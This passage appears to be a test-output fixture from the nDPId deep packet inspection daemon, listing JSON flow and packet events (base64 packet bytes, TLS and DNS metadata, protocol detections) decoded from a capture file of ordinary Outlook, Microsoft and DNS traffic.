\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6ekzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGEWCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzAR1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} +01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1LqA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} +02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} +02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoTzcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1626168078676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1626168078676,"pkt":"8BiYFWV8WNVuaKQACABFAACFmUUAAHgR1vEICAgIwKgBeQA1yx4AcZEiotGBgAABAAEAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAABwAwADAABAABT5QAzDGEyLTIyLTMzLTIzNQZkZXBsb3kGc3RhdGljEmFrYW1haXRlY2hub2xvZ2llcwNjb20A"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 